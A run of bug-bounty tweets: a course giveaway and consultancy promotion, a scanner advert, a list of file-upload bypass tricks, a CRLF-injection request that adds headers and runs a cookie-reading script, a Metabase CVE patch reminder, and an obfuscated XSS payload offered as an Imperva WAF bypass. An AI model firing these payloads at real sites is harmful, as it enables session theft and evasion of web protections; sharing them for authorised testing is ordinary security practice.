I want to build a larger following for @haksecio, but I'd rather give to the hacker community than pay for Twitter ads.
So - I'm giving away 5x @PentesterLab subscriptions, randomly selected from people who follow @haksecio and RT this tweet.
♥️
This @PentesterLab giveaway is still running.
I’m trying to promote my cybersecurity consultancy, @haksecio.
We provide:
🥷Penetration testing
📢Cybersecurity advice
📕Cybersecurity training
🎨Cybersecurity content marketing
Spread the word!
I recently got to know about a great tool @PrettyRecon. I had submitted 2 P3 and 2 High and 1 Medium reports in last 3 days, just using #PrettyRecon scanner. It saves a lot of time & efforts. Give it a try, just $15 per month. ⇾ https://t.co/uvLCBcIU2R #bugbountytip#bugbounty
⭐️⭐️⭐️#Pro
Bypass file upload restriction
by 'MikeChan'
1. Line Termination Trick
2. Content-Disposition Overflow
3. File Name Overflow
4. Duplicated Line
5. Double Extension
Another thing comes to your mind? Comment it :)
#FileUpload#BugBounty#BugBountyTip#BugBountyTips
Reflected XSS using CRLF
GET /endpoint?url=%0d%0aSet-Cookie:test=test -> header added in response headers
GET /endpoint?url=%0d%0aX-XSS-Protection:0%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html><script>alert(document.cookie)</script><!--
#bugbountytips#BugBounty#synack
I have created a script to #Automate Screen Capturing using #selenium. Works more like EyeWitness but can work seamlessly on windows.
Automated-Screen-Capture : https://t.co/wMpko0Kxbt
[1st ever Open Source Tool from me😁😅]
#bugbountytips#WebApp#Pentesting@Bugcrowd
There are more than 17k publicly accessible Metabase instances on shodan and few BB programs that were affected as well, the fix is super easy for
CVE-2021-41277 and the impact is CRITICAL, so I'd advise patching quickly : )
#bugbounty
On the event of 5.4k followers, I'm dropping a Imperva WAF bypass. Enjoy! 👉😎👈
(Make sure to URL encode the payload properly)
<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme